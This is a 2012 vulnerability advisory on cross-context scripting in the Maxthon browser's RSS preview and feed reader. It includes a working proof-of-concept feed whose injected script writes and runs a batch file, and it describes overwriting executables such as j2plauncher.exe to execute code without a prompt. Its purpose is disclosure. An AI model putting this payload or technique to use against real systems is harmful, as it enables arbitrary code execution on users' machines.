Vendor Site: Maxthon (www.maxthon.com)
Date: December, 5 2012 – CVE (TBA)
Affected Software: Maxthon 18.104.22.1680 and previous versions
Status: Unpatched (at the time of publishing)
Researcher: Roberto Suggi Liverani - @malerisch
PDF version: Maxthon_multiple_vulnerabilities_advisory.pdf
Cross Context Scripting
Injection is possible in two different conditions:
 User directly visits a malicious RSS page: e.g. http://x.x.x.x/maliciousrss.xml
In such case, the injection is rendered in the following point: mx://res/app/%7BGUID%7B/preview.htm?http://x.x.x.x/maliciousrss.xml
 User views or saves the malicious feed using Maxthon Feed Reader built-in component.
The Feed Reader is located at about:reader which is mapped to mx://res/app/%7BGUID%7B/reader.htm page. If the malicious feed is saved, injection is stored as well within the about:reader page.
Maxthon has to render the attack page in "UltraMode" to be affected by this vulnerability. The UltraMode is automatically set by default in Maxthon and makes use of Webkit.
A malicious user would need to convince a user to visit a link to exploit this vulnerability.
Malicious RSS Feed – Arbitrary Code Execution Exploit
<?xml version='1.0' encoding="ISO-8859-1"?>
<title>test'><img src=a onerror='var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")';></title>
<description>07/09/2008 - test <img src=a onerror='var b= new maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k dir");maxthon.program.Program.launch(b.name_,"C:")';></description>
<pubDate>Sun, 07 Sep 2008 12:00:00 GMT</pubDate>
Following disclosure of the bugs during HITB2012AMS conference, it was observed that the maxthon.program object was silently removed by Maxthon in recent versions. This only allows a malicious user to read and write files on the system.
Code execution without incurring in a warning or user prompt can still be achieved by overwriting an executable which can be called directly by the browser. A "dirty" way is to overwrite j2plauncher.exe assuming the victim has either JRE/JDK installed on the machine. The second step would be to force Maxthon to load java.exe (e.g. create an iframe that points to a page which loads a Java Applet). This approach was successfully tested on Windows 7.
On Windows XP, there are more choices to overwrite executable files, e.g. C:\\Program\ Files\\Outlook\ Express\\wab.exe and then force browser to invoke wab.exe via window.location='ldap://dummy'.
The PoC Metasploit module includes the "dirty" Java overwrite approach described above.
Maxthon - Cross Context Scripting (XCS) - RSS - Java overwrite technique - Metasploit in action:
13/02/2012 - Bug reported to multiple contacts
21/02/2012 - Reception of report confirmed but no further reply
21/02/2012 - Chased vendors - no reply
12/05/2012 - HITB2012AMS - bug disclosed during presentation
02/11/2012 - 25 new releases following the report – 2 bugs silently fixed
14/11/2012 - HackPra - bug and exploit module presented
Do not use Maxthon browser.